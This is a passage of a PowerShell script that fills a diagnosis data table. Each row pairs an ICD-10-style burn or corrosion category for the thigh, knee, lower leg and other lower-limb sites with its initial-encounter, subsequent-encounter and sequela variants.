limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of right lower limb, except ankle and foot","Burn of first degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of left lower limb, except ankle and foot","Burn of first degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of left lower limb, except ankle and foot","Burn of first degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of left lower limb, except ankle and foot","Burn of first degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of first degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thigh","Burn of first degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thigh","Burn of first degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right thigh","Burn of first degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thigh","Burn of first degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thigh","Burn of first degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left thigh","Burn of first degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thigh","Burn of first degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thigh","Burn of first degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified thigh","Burn of first degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right knee","Burn of first degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right knee","Burn of first degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right knee","Burn of first degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left knee","Burn of first degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left knee","Burn of first degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left knee","Burn of first degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified knee","Burn of first degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified knee","Burn of first degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified knee","Burn of first degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right lower leg","Burn of first degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right lower leg","Burn of first degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of right lower leg","Burn of first degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left lower leg","Burn of first degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left lower leg","Burn of first degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of left lower leg","Burn of first degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified lower leg","Burn of first degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified lower leg","Burn of first degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of unspecified lower leg","Burn of first degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right lower limb, except ankle and foot","Burn of first degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right lower limb, except ankle and foot","Burn of first degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of right lower limb, except ankle and foot","Burn of first degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left lower limb, except ankle and foot","Burn of first degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left lower limb, except ankle and foot","Burn of first degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of left lower limb, except ankle and foot","Burn of first degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of first degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of right lower limb, except ankle and foot","Burn of second degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of right lower limb, except ankle and foot","Burn of second degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of right lower limb, except ankle and foot","Burn of second degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of left lower limb, except ankle and foot","Burn of second degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of left lower limb, except ankle and foot","Burn of second degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of left lower limb, except ankle and foot","Burn of second degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of second degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thigh","Burn of second degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thigh","Burn of second degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right thigh","Burn of second degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thigh","Burn of second degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thigh","Burn of second degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left thigh","Burn of second degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thigh","Burn of second degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thigh","Burn of second degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified thigh","Burn of second degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right knee","Burn of second degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right knee","Burn of second degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right knee","Burn of second degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left knee","Burn of second degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left knee","Burn of second degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left knee","Burn of second degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified knee","Burn of second degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified knee","Burn of second degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified knee","Burn of second degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right lower leg","Burn of second degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right lower leg","Burn of second degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of right lower leg","Burn of second degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left lower leg","Burn of second degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left lower leg","Burn of second degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of left lower leg","Burn of second degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified lower leg","Burn of second degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified lower leg","Burn of second degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of unspecified lower leg","Burn of second degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right lower limb, except ankle and foot","Burn of second degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right lower limb, except ankle and foot","Burn of second degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of right lower limb, except ankle and foot","Burn of second degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left lower limb, except ankle and foot","Burn of second degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left lower limb, except ankle and foot","Burn of second degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of left lower limb, except ankle and foot","Burn of second degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of second degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of right lower limb, except ankle and foot","Burn of third degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of right lower limb, except ankle and foot","Burn of third degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of right lower limb, except ankle and foot","Burn of third degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of left lower limb, except ankle and foot","Burn of third degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of left lower limb, except ankle and foot","Burn of third degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of left lower limb, except ankle and foot","Burn of third degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot","Burn of third degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thigh","Burn of third degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thigh","Burn of third degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right thigh","Burn of third degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thigh","Burn of third degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thigh","Burn of third degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left thigh","Burn of third degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thigh","Burn of third degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thigh","Burn of third degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified thigh","Burn of third degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right knee","Burn of third degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right knee","Burn of third degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right knee","Burn of third degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left knee","Burn of third degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left knee","Burn of third degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left knee","Burn of third degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified knee","Burn of third degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified knee","Burn of third degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified knee","Burn of third degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right lower leg","Burn of third degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right lower leg","Burn of third degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of right lower leg","Burn of third degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left lower leg","Burn of third degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left lower leg","Burn of third degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of left lower leg","Burn of third degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified lower leg","Burn of third degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified lower leg","Burn of third degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of unspecified lower leg","Burn of third degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right lower limb, except ankle and foot","Burn of third degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right lower limb, except ankle and foot","Burn of third degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of right lower limb, except ankle and foot","Burn of third degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left lower limb, except ankle and foot","Burn of third degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left lower limb, except ankle and foot","Burn of third degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of left lower limb, except ankle and foot","Burn of third degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot","Burn of third degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thigh","Corrosion of unspecified degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thigh","Corrosion of unspecified degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right thigh","Corrosion of unspecified degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thigh","Corrosion of unspecified degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thigh","Corrosion of unspecified degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left thigh","Corrosion of unspecified degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thigh","Corrosion of unspecified degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thigh","Corrosion of unspecified degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified thigh","Corrosion of unspecified degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right knee","Corrosion of unspecified degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right knee","Corrosion of unspecified degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right knee","Corrosion of unspecified degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left knee","Corrosion of unspecified degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left knee","Corrosion of unspecified degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left knee","Corrosion of unspecified degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified knee","Corrosion of unspecified degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified knee","Corrosion of unspecified degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified knee","Corrosion of unspecified degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right lower leg","Corrosion of unspecified degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right lower leg","Corrosion of unspecified degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of right lower leg","Corrosion of unspecified degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left lower leg","Corrosion of unspecified degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left lower leg","Corrosion of unspecified degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of left lower leg","Corrosion of unspecified degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified lower leg","Corrosion of unspecified degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified lower leg","Corrosion of unspecified degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of unspecified lower leg","Corrosion of unspecified degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot","Corrosion of unspecified degree of multiple sites of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of right lower limb, except ankle and foot","Corrosion of first degree of unspecified site of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of right lower limb, except ankle and foot","Corrosion of first degree of unspecified site of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of right lower limb, except ankle and foot","Corrosion of first degree of unspecified site of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of left lower limb, except ankle and foot","Corrosion of first degree of unspecified site of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of left lower limb, except ankle and foot","Corrosion of first degree of unspecified site of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of left lower limb, except ankle and foot","Corrosion of first degree of unspecified site of left lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot","Corrosion of first degree of unspecified site of unspecified lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thigh","Corrosion of first degree of right thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thigh","Corrosion of first degree of right thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right thigh","Corrosion of first degree of right thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thigh","Corrosion of first degree of left thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thigh","Corrosion of first degree of left thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left thigh","Corrosion of first degree of left thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thigh","Corrosion of first degree of unspecified thigh, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thigh","Corrosion of first degree of unspecified thigh, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified thigh","Corrosion of first degree of unspecified thigh, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right knee","Corrosion of first degree of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right knee","Corrosion of first degree of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right knee","Corrosion of first degree of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left knee","Corrosion of first degree of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left knee","Corrosion of first degree of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left knee","Corrosion of first degree of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified knee","Corrosion of first degree of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified knee","Corrosion of first degree of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified knee","Corrosion of first degree of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right lower leg","Corrosion of first degree of right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right lower leg","Corrosion of first degree of right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of right lower leg","Corrosion of first degree of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left lower leg","Corrosion of first degree of left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left lower leg","Corrosion of first degree of left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of left lower leg","Corrosion of first degree of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified lower leg","Corrosion of first degree of unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified lower leg","Corrosion of first degree of unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of unspecified lower leg","Corrosion of first degree of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right lower limb, except ankle and foot","Corrosion of first degree of multiple sites of right lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right lower limb, except ankle and foot","Corrosion of first degree of multiple sites of right lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of right lower limb, except ankle and foot","Corrosion of first degree of multiple sites of right lower limb, except ankle and foot, sequela") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left lower limb, except ankle and foot","Corrosion of first degree of multiple sites of left lower limb, except ankle and foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of first degree of multiple sites of left lower limb, except ankle and foot","Corrosion of first degree of multiple sites of left lower limb, except ankle and foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Corrosion of 